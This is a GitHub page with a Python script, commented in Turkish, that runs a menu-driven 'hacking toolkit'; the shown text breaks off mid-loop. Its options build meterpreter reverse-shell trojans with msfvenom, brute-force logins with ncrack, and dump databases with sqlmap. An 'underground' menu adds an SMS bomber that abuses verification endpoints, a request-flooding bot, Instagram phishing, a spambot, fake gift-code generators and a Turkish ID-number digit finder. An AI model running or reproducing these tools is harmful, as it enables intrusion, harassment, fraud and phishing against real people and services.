-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathsexettintoolsv13.py
1623 lines (1270 loc) · 45.9 KB
/
sexettintoolsv13.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/env python
import os
import py_compile
import random
import hashlib
import socket
import urllib.request
import urllib.parse
srum = open("surum.txt")
surum = srum.read()
os.system("apt-install figlet")
os.system("apt-install chkrootkit")
os.system("clear")
import acilis
sexettinsecim = input("Seçiminizi yazınız > ")
if(sexettinsecim=="1"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
anahtarkelime = input("Anahtar Kelime Girin: ")
os.system("searchsploit " + anahtarkelime)
istek = input("Yeni arama yapmak ister misiniz? (y/n): ")
if(istek =="y"):
os.system("python3 sexettintoolsv"+surum+".py")
elif(istek =="n"):
print("Görüşürüüüz :') ")
elif(sexettinsecim=="2"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Güvenlik Duvarı Tespit Etme Aracına Hoş Geldin
''')
guvenliksite = input("Site Adresini Girin: ")
os.system("wafw00f " + guvenliksite)
elif(sexettinsecim=="3"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Kaba Kuvvet Aracına Hoş Geldin :)
1-) FTP
2-) SSH
3-) TELNET
4-) HTTP
5-) SMB
6-) RDP
7-) SIP
8-) REDİS
9-) VNC
10-) PostgreSQL
11-) SQL
''')
islemno = input("İşlem Numarasını Giriniz: ")
hedefip = input("Hedef Ip Giriniz: ")
kadi = input("Kullanıcı Adı Dosya Yolu: ")
sifre = input("Şifrelerin Bulunduğu Dosya Yolu: ")
if(islemno=="1"):
os.system("nrack -p 21 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="2"):
os.system("ncrack -p 22 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="3"):
os.system("ncrack -p 23 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="4"):
os.system("ncrack -p 24 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="5"):
os.system("ncrack -p 25 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="6"):
os.system("ncrack -p 26 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="7"):
os.system("ncrack -p 27 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="8"):
os.system("ncrack -p 28 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="9"):
os.system("ncrack -p 29 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="10"):
os.system("ncrack -p 30 -u " + kadi + " -P " + sifre + " " + hedefip)
elif(islemno=="11"):
os.system("ncrack -p 31 -u " + kadi + " -P " + sifre + " " + hedefip)
else:
print("Hatalı seçim yaptın >:(")
elif(sexettinsecim=="4"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Port Tarama")
print('''
Port Tarama Aracına Hoşgeldin
1-) Hızlı Tarama
2-) Servis ve Versiyon Bilgisi
3-) İşletim Sistemi Bilgisi
''')
islemno = input("İşlem Numarasını Girin: ")
if(islemno=="1"):
hedefip = input("Hedef ip Giriniz: ")
os.system=("nmap " +hedefip)
elif(islemno=="2"):
hedefip = input("Hedef ip Giriniz: ")
os.system("nmap -sS -sV " +hedefip)
elif(islemno=="3"):
hedefip = input("Hedef ip Giriniz: ")
os.system("nmap -O " +hedefip)
else:
print("Hatalı seçim yaptın kanka")
elif(sexettinsecim=="5"):
os.system("apt-get install chkrootkit")
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Rootkit Tarama Aracına Hoşgeldiniz!
''')
os.system("chkrootkit")
elif(sexettinsecim=="6"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Trojan Oluşturma Aracına Hoş Geldin
''')
ip = input("Local veya Dış Ip giriniz: ")
port = input("Port Girin: ")
print('''
1-) windows/meterpreter/reverse_tcp
2-) windows/meterpreter/reverse_http
3-) windows/meterpreter/reverse_https
''')
payload = input("Payload No Giriniz: ")
kayityeri = input("Kayıt Yerini Giriniz: ")
if(payload=="1"):
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)
elif(payload=="2"):
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)
elif(payload=="3"):
os.system("msfvenom -p windows/meterpreter/reverse_https LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)
elif(payload=="4"):
os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f apk -o " + kayityeri)
elif(payload=="5"):
os.system("msfvenom -p android/meterpreter/reverse_http LHOST=" + ip + " LPORT=" + port + " -f apk -o " + kayityeri)
elif(payload=="6"):
os.system("msfvenom -p android/meterpreter/reverse_https LHOST=" + ip + " LPORT=" + port + " -f apk -o " + kayityeri)
else:
print("Hatalı Seçim Yaptın Kanka ")
elif(sexettinsecim=="7"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Zaafiyet Analizi Aracına Hoşgeldiniz
''')
hedefzaafiyetip = input("Hedef ip giriniz: ")
os.system("nikto -h " +hedefzaafiyetip)
elif(sexettinsecim=="8"):
os.system("apt-get install figlet")
os.system("apt-get install lynis")
os.system("clear")
os.system("figlet Sexettin")
print('''
Hoşgeldiniz Zaafiyet analizi v2 aracı başlatılıyor...
''')
os.system("lynis audit system")
print('''
ANALİZ SONUCU
''')
elif(sexettinsecim=="9"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
En Kısa Yoldan Wordlist Oluşturma Toolu
''')
minc = input("Minimum kaç haneli olsun? ")
maxc = input("Maximum kaç haneli olsun? ")
icindekikelime = input("İçinde hangi kelimeler/rakamlar bulunsun? ")
dosyaadic = input("Dosyanın adı ne olsun? (uzantısı ile beraber yazınız) ")
os.system("crunch "+minc+" "+maxc+" "+icindekikelime+" -o "+dosyaadic)
elif(sexettinsecim=="10"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Vpn Kontrol Aracına Hoşgeldiniz!
''')
vpnhedefip = input("Hedef Ip Giriniz > ")
os.system("ike-scan "+vpnhedefip)
elif(sexettinsecim=="11"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
MAC Adresi Değiştirme Aracına Hoşgeldiniz!
1-) Mac Adresini Random Belirle
2-) Mac Adresini Kendin Belirle
3-) Mac Adresini Orjinale Döndür
''')
macislem = input("İşlem Numarasını Yazınız > ")
if(macislem=="1"):
os.system("ifconfig eth0 down")
os.system("macchanger -r eth0")
os.system("ifconfig eth0 up")
print("\033[92mYeni mac adresi random belirlendi!]")
elif(macislem=="2"):
macadres = input("Yeni Mac Adresini Giriniz > ")
os.system("ifconfig eth0 down")
os.system("macchanger --mac "+macadres+" eth0")
os.system("ifconfig eth0 up")
print("\033[92mYeni mac adresi elle belirlendi!]")
elif(macislem=="3"):
os.system("ifconfig eth0 down")
os.system("macchanger -p eth0")
os.system("ifconfig eth0 up")
print("\033[92mMac Adresi Orjinale Döndürüldü!]")
else:
print("Hatalı Seçim Yaptınız")
elif(sexettinsecim=="12"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
WORDPRESS Tarama Tool
1-) Hızlı Tarama
2-) Eklenti Tarama
3-) Tema Tarama
4-) Yönetici Kullanıcı Adı Tarama
''')
wpislem = input("İşlem Numarası Giriniz > ")
if(wpislem=="1"):
sitewp = input("Site Adresi Giriniz > ")
os.system("wpscan --url " +sitewp)
elif(wpislem=="2"):
sitewp = input("Site Adresi Giriniz > ")
os.system("wpscan --url " +sitewp+ " --enumerate p")
elif(wpislem=="3"):
sitewp = input("Site Adresi Giriniz > ")
os.system("wpscan --url " +sitewp+ " --enumerate t")
elif(wpislem=="4"):
sitewp = input("Site Adresi Giriniz > ")
os.system("wpscan --url " +sitewp+ " --enumerate u")
else:
print("Hatalı Seçim Yaptınız")
elif(sexettinsecim=="13"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
Derleme Aracına Hoşgeldiniz!
''')
derle = input("Program Yolunu Giriniz > ")
py_compile.compile(derle)
elif(sexettinsecim=="14"):
os.system("apt-get install figlet")
os.system("clear")
os.system("figlet Sexettin")
print('''
1-) Açıklı Siteyi Biliyorum
2-) Açıklı Site Ve Veritabanı Adını Biliyorum
3-) Açıklı Siteyi Veritabanı Adını Ve Tablo Adını Biliyorum
örnek link: http://www.suesupriano/article.php?id=25
''')
sqlsecim = input("Seçim yapınız > ")
if(sqlsecim=="1"):
aciklilink = input("site gir")
os.system("sqlmap -u "+aciklilink+" --dbs --random-agent")
elif(sqlsecim=="2"):
aciklilink = input("Açıklı siteyi girin > ")
averitabani = input("veritabanı Adını Giriniz > ")
os.system("sqlmap -u "+aciklilink+" -D "+averitabani+" --tables --random-agent")
elif(sqlsecim=="3"):
aciklilink = input("Açıklı siteyi girin > ")
averitabani = input("veritabanı Adını Giriniz > ")
tablo = input("Tablo Adını Giriniz > ")
os.system("sqlmap -u "+aciklilink+" -D "+averitabani+" - T "+tablo+" --columns --random-agent")
else:
print("Hatalı Seçim Yaptın Kanka")
elif(sexettinsecim=="15"):
os.system("apt-get install figlet")
os.system("clear")
print("\033[92m")
print('''
.-.____________________.-.
___ _.' .-----. _____________|
/_._/ ( | /_____________|
/ ` _ ____/
|_ .\( || ____ _ _ _ _
.' `-._/__`_// / ___| _____ _____| |_| |_(_)_ __ (_)_ __
.' | \___ \ / _ \ \/ / _ \ __| __| | '_ \| | '_ \
/ / _ __) | __/> < __/ |_| |_| | | | | | | | |
/ | |____/ \___/_/\_\___|\__|\__|_|_| |_|_|_| |_|
| '
| \ _ _ ___ ___
`-._____.-' _ _ ___ _ __ __ _| | |_|_ _|___|_ _|
| | | |/ _ \ '__/ _` | | __|| |/ __|| |
| |_| | __/ | | (_| | | |_ | |\__ \| |
\__, |\___|_| \__,_|_|\__|___|___/___|
|___/
YERALTINA HOŞGELDİNİZ ;)
1-) Dic0rd nitro generator
2-) Şifre Oluşturucu
3-) Şifre OLuşturucu v2
4-) G00gle pIay kod generator
5-) P3bg u¢ generator
6-) P3bg u¢ generatorv2
7-) P3bg u¢ generatorv3
8-) P3bg u¢ generatorv4
9-) P3bg u¢ generatorv5
10-) Kullanıcı Adı ile Hesap Bulma
11-) T¢ Son 2 Hane Bulma
12-) An0nimSMS (Hata alanlar vpn ile denesin)
13-) Telefon Numarasından Şehir Bulma (TRde demo)
14-) Panelsiz Mail
15-) Admin panel tara
16-) Spambot
17-) Ip adresinden bilgi topla
18-) UltraBot
19-) Oto tıklayıcı
20-) SxBomb (Demo)
21-) Zip Şifre Kırıcı
22-) Wordlist oluşturucu
23-) Instagram Phishing
24-) Instagram Bot
25-) Sitedeki Linkleri Çekme
26-) Sitedeki Yazıları Çekme
27-) Sitedeki Resim Yollarını Çekme
28-) Dosyalar Arası Veri Karşılaştırma
29-) StnCrypt
30-) Dosya içerisinde arama işlemleri (linux)
31-) Anamenüye dön
''')
yeraltisecim = input("Sizi Nereye Alayım? ")
if(yeraltisecim=="1"):
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(16):
password_sayi = random.choice(chars)
password = password + password_sayi
print("discord.gift/"+password)
elif(yeraltisecim=="2"):
import random
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890.!+-"
while 1:
password_uzunluk = int(input("Ne kadar uzunlukta olsun? "))
password_sayi = int(input("Kaç tane şifre oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(0,password_uzunluk):
password_sayi = random.choice(chars)
password = password + password_sayi
print("Senin için oluşturduğum şifre :" , password)
elif(yeraltisecim=="3"):
import random
chars = input("İçinde olmasını istediğiniz harf rakam sembol vb giriniz: ")
while 1:
password_uzunluk = int(input("Ne kadar uzunlukta olsun? "))
password_sayi = int(input("Kaç tane şifre oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(0,password_uzunluk):
password_sayi = random.choice(chars)
password = password + password_sayi
print("Senin için oluşturduğum şifre :" , password)
elif(yeraltisecim=="4"):
chars = "ABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(16):
password_sayi = random.choice(chars)
password = password + password_sayi
print(password)
elif(yeraltisecim=="5"):
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(18):
password_sayi = random.choice(chars)
password = password + password_sayi
print(password)
elif(yeraltisecim=="6"):
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(16):
password_sayi = random.choice(chars)
password = password + password_sayi
print("eKkVp-"+password)
elif(yeraltisecim=="7"):
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(13):
password_sayi = random.choice(chars)
password = password + password_sayi
print("rHira"+password)
elif(yeraltisecim=="8"):
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(13):
password_sayi = random.choice(chars)
password = password + password_sayi
print("pT42C"+password)
elif(yeraltisecim=="9"):
chars = "abcdefghijklmnoprstuvyzqwABCDEFGHIJKLMNOPRSTUVYQW1234567890"
while 1:
password_sayi = int(input("Kaç tane oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(13):
password_sayi = random.choice(chars)
password = password + password_sayi
print("RJNsK"+password)
elif(yeraltisecim=="10"):
hesapbul = input("Kullanıcı Adı Giriniz > ")
print("")
print("\033[92mFACEBOOK > ","https://www.facebook.com/"+hesapbul)
print("")
print("INSTAGRAM > ","https://www.instagram.com/"+hesapbul)
print("")
print("TWITTER > ","https://www.twitter.com/"+hesapbul)
print("")
print("YOUTUBE > ","https://www.youtube.com/"+hesapbul)
print("")
print("BLOGGER > ","https://"+hesapbul+".blogspot.com")
print("")
print("REDDIT > ","https://www.reddit.com/user/"+hesapbul)
print("")
print("GITHUB > ","https://www.github.com/"+hesapbul)
print("")
print("STEAM > ","https://steamcommunity.com/id/"+hesapbul)
print("")
print("VK > ","https://vk.com/"+hesapbul)
print("")
print("SPOTIFY > ","https://open.spotify.com/user/"+hesapbul)
print("")
print("WATTPAD > ","https://www.wattpad.com/user/"+hesapbul)
print("")
print("WORDPRESS > ","https://"+hesapbul+".wordpress.com")
print("")
print("PINTEREST > ","https://www.pinterest.com/"+hesapbul)
print("")
print("TUMBLR > ","https://"+hesapbul+".tumblr.com")
print("")
print("FLICKR > ","https://www.flickr.com/people/"+hesapbul)
print("")
print("SOUNDCLOUD > ","https://soundcloud.com/"+hesapbul)
print("")
elif(yeraltisecim=="11"):
tcno = input("TC Kimlik No İlk 9 Hanesini Giriniz: ")
a, b, toplamDokuz = 0, 0, 0
for i in range(9):
toplamDokuz = toplamDokuz+int(tcno[i])
if i%2 == 0:
a = a+7*int(tcno[i])
elif i%2 == 1:
b = b+int(tcno[i])
if i == 8:
haneOn = (a-b)%10
haneOnBir = (haneOn+toplamDokuz)%10
print(tcno+str(haneOn)+str(haneOnBir))
elif(yeraltisecim=="12"):
os.system("pip install requests")
import requests
print("Günlük 1 mesaj hakkınız vardır numarayı +9055555555555 şeklinde giriniz link koymak yasak karakter sınırı düşüktür")
telefonno = input("Telefon Numarası Giriniz : ")
mesaj = input("Mesajınızı Giriniz: ")
resp = requests.post('https://textbelt.com/text', {
'phone': telefonno,
'message': mesaj,
'key': 'textbelt',
})
print(resp.json())
elif(yeraltisecim=="13"):
import phonenumbers
from phonenumbers import geocoder
numara = input("Numara giriniz +90xxx şeklinde: ")
telno = phonenumbers.parse(numara)
print(geocoder.description_for_number(telno,"tr"))
elif(yeraltisecim=="14"):
import string
var1 = ("@hotmail.com","@autlook.com","@gmail.com","@isecv.com","@dkt1.com","@rphinfo.com","@sc2hub.com","@firemailbox.club","@upimagine.com","@githabs.com","@tribalks.com","@vmani.com","@irezavh.com","",)
var2 = ("xowason758","j.a.v.ierfran.ci.s.c.otmp","nineti5328","sdhumd4pik","nijraea423da","mkdare3092","kajiore441","pzadek544","pidora9832","xydg6mltfq","clgbqs47md","ugasaie232d","njfaf453t","42dadwr3r3","gerritc91","kyri771","sabo432","hesaplzaim45","noobels76","hda32dae3","hafeh10084","wifave8166","yovoc23640","hsabial394","rafe42esz","edbadaw45","daosan2142","fcafete4217","dafeka323a","gafwe23fa","braianmax4232")
import random
mail = random.choice(var1)
kelimeler = random.choice(var2)
print("\n Tek kullanımlık panelsiz mail.İlk deneyişte kabul etmezse bir daha üretebilirsiniz")
print("||||||||||||||||||||||||||||||||||")
print("\n"+kelimeler+mail+"\n")
print("||||||||||||||||||||||||||||||||||")
elif(yeraltisecim=="15"):
url = input("Url giriniz > ")
print("")
print("\033[92mAlttaki linklerden biri %70 ihtimalle panel")
print("")
print(url+"/admin.php")
print("")
print(url+"/admin.html")
print("")
print(url+"/administrator")
print("")
print(url+"/admin")
print("")
print(url+"/adminpanel")
print("")
print(url+"/cpanel")
print("")
print(url+"/login")
print("")
print(url+"/wp-login.php")
print("")
print(url+"/admins")
print("")
print(url+"/logins")
print("")
print(url+"/admin.asp")
print("")
print(url+"/adm")
print("")
print(url+"/admin/account.html")
print("")
print(url+"/admin/login.html")
print("")
print(url+"/admin/login.htm")
print("")
print(url+"/admin/controlpanel.html")
print("")
print(url+"/admin.htm")
print("")
print(url+"/admin/controlpanel.htm")
print("")
print(url+"admin/adminLogin.html")
print("")
print(url+"admin/adminLogin.htm")
print("")
elif(yeraltisecim=="16"):
os.system("pip install pyautogui")
os.system("python3 spambot.py")
elif(yeraltisecim=="17"):
import urllib.parse
import urllib.request
import os
ip = input("Ip giriniz > ")
son = ("http://ip-api.com/json/"+ip)
son2 = ("https://api.iplocation.net/?ip="+ip)
print("\n SONUÇ: \n")
urllib.request.urlretrieve(son, "sonuc.json")
import json
yazilmis = open("sonuc.json")
jsonveri = yazilmis.read()
veriler = json.loads(jsonveri)
print("Durum: "+veriler["status"])
print("Ülke: "+veriler["country"])
print("Ülke Kodu: "+veriler["countryCode"])
print("Bölge Numarası: "+veriler["region"])
print("Şehir: "+veriler["city"])
print("Posta Kodu: "+veriler["zip"])
print("Saat Dilimi: "+veriler["timezone"])
print("İnternet Sağlayıcısı: "+veriler["isp"])
print("Org: "+veriler["org"])
print("As: "+veriler["as"])
print("Hedef: "+veriler["query"])
print("\n ------------------Json verileri------------------ \n \n"+jsonveri)
os.system("rm -rf sonuc.json")
elif(yeraltisecim=="18"):
import urllib.request
import threading
import time
header_kodlarım = {
'User-Agent' : 'Mozilla/5.0 (Machintosh; sexettintool X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecho) Sexettintool/48.0.2564.116 ultrabot/537.36'}
site_adresi = input("Site adresi giriniz > ")
site_adresi2 = site_adresi
istek = urllib.request.Request(site_adresi, headers= header_kodlarım)
istek2 = urllib.request.Request(site_adresi2, headers= header_kodlarım)
istek3 = urllib.request.Request(site_adresi, headers= header_kodlarım)
istek4 = urllib.request.Request(site_adresi, headers= header_kodlarım)
istek5 = urllib.request.Request(site_adresi, headers= header_kodlarım)
dos = urllib.request.urlopen(istek)
for i in range(1,5):
html = urllib.request.urlopen(istek)
print("başarılı,devam ediyorum.")
time.sleep(5)
for i in range(1,4):
urllib.request.urlopen(istek2)
urllib.request.urlopen(istek3)
print("başarılı,devam ediyorum.")
time.sleep(10)
for i in range(1,3):
t1 = threading.Thread(target=dos)
t1.start()
elif(yeraltisecim=="19"):
os.system("pip install pynput")
os.system("python3 ototikla.py")
elif(yeraltisecim=="20"):
import requests
import urllib.request
import time
print("\n Yapım aşamasındadır.Tam çalışmayabilir.Sorumluluk kabul edilmez.")
num = input("Sms bomb için numara gir (+905555555555 şeklinde) ")
headerler = {
'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) SxTOOL/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36'}
try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num))
except:
print("Başarısız")
try:
print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': num}))
except:
print("Başarısız")
try:
print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': num}))
except:
print("Başarısız")
try:
print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":num}))
except:
print("Başarısız")
try:
print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': num}))
except:
print("Başarısız")
try:
print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers=headerler))
except:
print("Başarısız")
elif(yeraltisecim=="21"):
print("\033[92m")
os.system("clear")
print('''
.--------.
/ .------.
| |
_| |________| |_
.' |_| |_| '. Wordlistiniz var mı?
'._____ ____ _____.'
| .'____'. | (Yok seçeneği işaretlenirse program sizin için oluşturacak)
'.__.'.' '.'.__.'
'.__ |Sxtool| __.| 1-) Wordlistim var
| '.'.____.'.' |
'.____'.____.'____.' 2-) Wordlistim yok
'.________________.'
''')
aaaas = input("Seç > ")
if(aaaas=="2"):
import random
import pyzipper
import os
chars = input("İçinde olmasını istediğiniz harf rakam sembol vb giriniz: ")
password_uzunluk = int(input("Ne kadar uzunlukta olsun? "))
password_sayi = int(input("Kaç tane şifre oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(0,password_uzunluk):
password_sayi = random.choice(chars)
password = password + password_sayi
#print(password)
passworda = (password+"\n")
dosya = open("wlist.txt","a")
dosya.write(passworda)
wordlist = ("wlist.txt")
file = input("Zip dosya yolunu belirtiniz > ")
icdosya = input("Zip dosyası içinden herhangi bi dosya adı+uzantı giriniz > ")
fileobject = pyzipper.AESZipFile(file)
with open(wordlist,"rb") as wordlist:
for word in wordlist:
try:
fileobject.pwd = word.strip()
fileobject.read(icdosya)
except:
print("\033[93mŞifre denendi = ",word.decode().strip())
continue
else:
print("\033[92mŞifre bulundu! İşte şifre = ",word.decode().strip())
os.system("rm -rf wlist.txt")
exit(0)
os.system("rm -rf wlist.txt")
print("\033[91mŞifre Bulunamadı")
elif(aaaas=="1"):
import pyzipper
import os
os.system("pip install pyzipper")
wordlist = input("Wordlist Yolunu Belirtiniz > ")
file = input("Zip dosya yolunu belirtiniz > ")
icdosya = input("Zip dosyası içinden herhangi bi dosya adı+uzantı giriniz > ")
fileobject = pyzipper.AESZipFile(file)
with open(wordlist,"rb") as wordlist:
for word in wordlist:
try:
fileobject.pwd = word.strip()
fileobject.read(icdosya)
except:
print("\033[93mŞifre denendi = ",word.decode().strip())
continue
else:
print("\033[92mŞifre bulundu! İşte şifre = ",word.decode().strip())
exit(0)
print("\033[91mŞifre Bulunamadı")
elif(yeraltisecim=="22"):
import random
import os
chars = input("İçinde olmasını istediğiniz harf rakam sembol vb giriniz: ")
password_uzunluk = int(input("Ne kadar uzunlukta olsun? "))
password_sayi = int(input("Kaç tane şifre oluşturulsun? "))
for x in range(0,password_sayi):
password = ""
for x in range(0,password_uzunluk):
password_sayi = random.choice(chars)
password = password + password_sayi
passworda = (password+"\n")
dosya = open("sxwlist.txt","a")
dosya.write(passworda)
elif(yeraltisecim=="23"):
os.system("python3 oltalama/openserver.py")
elif(yeraltisecim=="24"):
os.system("clear")
os.system("python3 instabot.py")
elif(yeraltisecim=="25"):
import requests
from bs4 import BeautifulSoup
header_kod = { 'User-Agent' : 'Mozilla/5.0 (Machintosh; Sexettin X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecho) Sexettin/48.0.2564.116 Naber/537.36'}
print("Örnek site: https://google.com http/https eklemeyi unutmayın")
hedefsite = input("Hedef Url Giriniz: ")
hedefl = requests.get(hedefsite,headers=header_kod)
hedefg = hedefl.content
guzelcorba = BeautifulSoup(hedefg,"html.parser")
for i in guzelcorba.find_all("a"):